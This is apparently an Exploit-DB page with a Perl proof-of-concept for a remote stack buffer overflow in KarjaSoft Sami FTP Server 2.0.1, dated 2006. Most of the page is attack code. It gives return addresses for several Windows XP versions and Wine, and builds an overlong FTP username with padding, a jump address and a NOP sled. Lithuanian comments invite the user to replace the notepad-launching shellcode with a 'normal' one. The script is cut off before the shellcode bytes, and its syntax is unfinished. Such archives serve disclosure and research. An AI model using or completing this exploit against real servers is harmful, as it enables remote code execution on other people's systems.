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exploitdbCritical SecurityEDB-ID:1448
HistoryJan 25, 2006 - 12:00 a.m.

KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow

Critical Security

AI Score




# Sami FTP Server v2.0.1 Remote notepad.exe execution PoC by Critical Security research
# Tested on Windows XP SP2, Windows XP SP0 and even on FreeBSD 6.0-RELEASE Wine 0.9.6 :))

use Net::FTP;                 # <- jo, að tinginys :)
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------\n";
print "Usage : -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n";
print " Offsets: \n";
print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n";
print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n";
print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n";
print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp\n";
print " If values not specified, default values will be used.\n";
print " Example : ./ -h127.0.0.1 -y127.0.0.1 -o1\n";
print "--------------------------------------------------------------------\n";
$host =   "";        # aukos ip
$yourip = "" ;       # Reikalingas tam, kad bûtø galima sulyginti ðelkodà, nes i steka ásiraðo ir jusu ip adresas, todel áraðykit savo iðorini (jei neturit tokio - gateway ip)
$offset = "\xE0\x3A\xB4\x76"; # defaultinis offsetas á winmm.dll esantá call esp   (WinXP SP 2)

foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/);
$offset = $1 if ($_=~/-o(.*)/);
#offsetø suradimui naudokit findjmp.exe arba opcodø db ;)  (call esp/jmp esp..)
switch ($offset) {
case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp
case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp
case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp
case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp

foreach $letter (split '', $yourip) { $c++;};
$ftp = Net::FTP->new($host, Debug => 0)  or die "Cannot connect: $@";
$user = "A" x 213 . # vaþiuojam iki returno :O  (cia irgi galima kiðt ðelkodà :) )
"A" x (15 - $c)   . # dar keli baitai sulyginimui, nes á stekà taip pat ásiraðo ir ip adresas, todël reikia pagal já paskaièiuot, kur raðyt ret adresà
$offset .           # ret adresas á kokio dll'o call esp  ar jmp esp, ar ka nors panaðaus svarbu, kad nuðoktume á esp ;)
"\x90" x 25 .       # nop'ø sled'as, kad sulygintume su esp esanèiu adresu

# ðelkodas paleidþiantis notepadà (ðelkodas skirtas tiem kas sakë, jog critical mëgsta DoS :*) - norësit, ásidësit normalø..

# [2006-01-25]

AI Score


